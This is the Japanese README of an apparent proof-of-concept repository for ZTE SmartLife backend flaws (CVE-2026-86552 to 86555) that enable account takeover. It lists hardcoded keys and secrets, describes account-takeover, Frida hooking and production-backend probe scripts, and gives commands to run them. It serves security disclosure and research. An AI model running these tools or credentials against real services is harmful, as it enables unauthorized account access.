
ZTE SmartLifeのセキュリティ脆弱性によりアカウント乗っ取りが可能に:Google Playでの10万件以上のダウンロードとCVE-2026-86552からCVE-2026-86555。
このディレクトリには、ZTE SmartLife バックエンドの脆弱性(CVE-2026-86552、CVE-2026-86553、CVE-2026-86554、CVE-2026-86555)を検証するために使用された、最小限のスタンドアロン PoC ツールが含まれています。
すべてのエンドポイントは ZTE によって修正され、鍵素材はローテーションされています。以下のスクリプトと鍵は、セキュリティ研究および技術検証のために公開されています。
| パラメータ | 値 | 役割 |
|---|---|---|
| Bootstrap Decrypt Key (CVE-2026-86555) | 096760a7a99d99d12de9fecbfca568c0 | AppMainBackend.setUacSignInfo にハードコードされた AES-128-GCM 鍵 |
Client Symmetric Key (appClientKey) | djrom(&)(&)MORJD | X-Auth-Value 署名およびペイロードパラメータ暗号化に使用される AES-128-GCM 鍵 |
Shared Secret (appUacSec) | b2cfe28732612cfd81de7a22ace2034317a47eb94683a016a85cc0883597c625 | タイムスタンプ付き X-Auth-Value トークンに組み込まれた埋め込みシークレット |
Access Key (appUacItp) | 271950143414fnu4mb3lxxotfj5mi1tp | X-Itp-Value: accessKey=... で渡されるアクセスキー |
App / Client ID (appId) | 271950143414 | クライアントシステム識別子 |
Tenant ID (tenantId) | 10001 | クラウドテナント識別子 |
direct-replay/account-takeover-poc.ps1 を含みます。これは以下を実証する自動化された PowerShell 7 スクリプトです:
CVE-2026-86555)accountId の開示(CVE-2026-86554)CVE-2026-86553)CVE-2026-86552)frida/公式 Android クライアント(com.zte.smarthome.abroad)向けのインプロセスランタイム計装スクリプトを含みます:
smartlife_dump_uac.js: クライアントのブートストラップ復号をフックし、UAC 設定と送信ヘッダーをダンプします。smartlife_signing_oracle.js: アプリプロセスを介してヘッダーに署名し、ペイロードをリモートで暗号化する Frida RPC メソッドを公開します。runtime-path-probes/Invoke-Runtime-AppAuth-AccountProbes.ps1 を含みます。これは、復元された認証情報を使用してアクティブな本番バックエンド(https://zxuacde.smart-zte.com)を検証するスタンドアロンのプローブスクリプトです。
cd direct-replay
pwsh -ExecutionPolicy Bypass -File .\account-takeover-poc.ps1
cd runtime-path-probes
pwsh -ExecutionPolicy Bypass -File .\Invoke-Runtime-AppAuth-AccountProbes.ps1
cd frida
frida -U -f com.zte.smarthome.abroad -l smartlife_dump_uac.js